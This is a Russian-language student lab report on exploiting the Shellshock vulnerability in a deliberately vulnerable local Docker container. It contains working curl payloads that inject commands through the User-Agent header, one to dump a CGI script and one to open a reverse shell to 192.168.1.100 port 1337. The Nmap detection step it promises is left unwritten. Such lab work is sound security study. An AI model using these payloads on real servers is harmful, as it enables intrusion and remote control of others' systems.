53 lines
1.8 KiB
Markdown
53 lines
1.8 KiB
Markdown
# Модуль 2. Сканирование на уязвимости. Сетевые сканирования
|
||
## Практическое задание №2
|
||
### Задание №1. Детектирование Shellshock с помощью Nmap
|
||
|
||
1. Скачаем [репозиторий](https://github.com/Zenithar/docker-shellshockable) и соберем Docker-контейнер
|
||
|
||

|
||
|
||
2. Запустим контейнер командой `docker run -d -p 80:80 --name shellshock marker689/shellshockable`
|
||
|
||
3. Посмотрим вывод CGI-скрипта.
|
||
|
||
```
|
||
curl http://localhost/cgi-bin/shockme.cgi
|
||
```
|
||

|
||
|
||
Вывод соответствует коду в CGI-скрипте:
|
||
|
||
```bash
|
||
#!/usr/local/bin/bash
|
||
echo "Content-type: text/html"
|
||
echo ""
|
||
echo "https://shellshocker.net/"
|
||
```
|
||
|
||
4. Выполним эксплуатацию уязвимости Shellshock
|
||
|
||
`curl -A "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /usr/lib/cgi-bin/shockme.cgi" http://localhost/cgi-bin/shockme.cgi`
|
||
|
||

|
||
|
||
```bash
|
||
#!/usr/local/bin/bash
|
||
echo "Content-type: text/html"
|
||
echo ""
|
||
echo "https://shellshocker.net/"
|
||
```
|
||
|
||
Мы раскрыли содержимое скрипта, также можно сделать ревер-шелл.
|
||
|
||
5. `curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'sh -i >& /dev/tcp/192.168.1.100/1337 0>&1'" http://localhost/cgi-bin/shockme.cgi`
|
||
|
||

|
||
|
||
6. Приступим к написанию
|
||
|
||
|
||
|
||
# Итог лабораторной работы
|
||
На этом лабораторная работа окончена, файл отчет в формате pdf во вложении.
|
||
|
||
Выполнил: Харитонов Марат Русланович, студенческий билет №М235314. |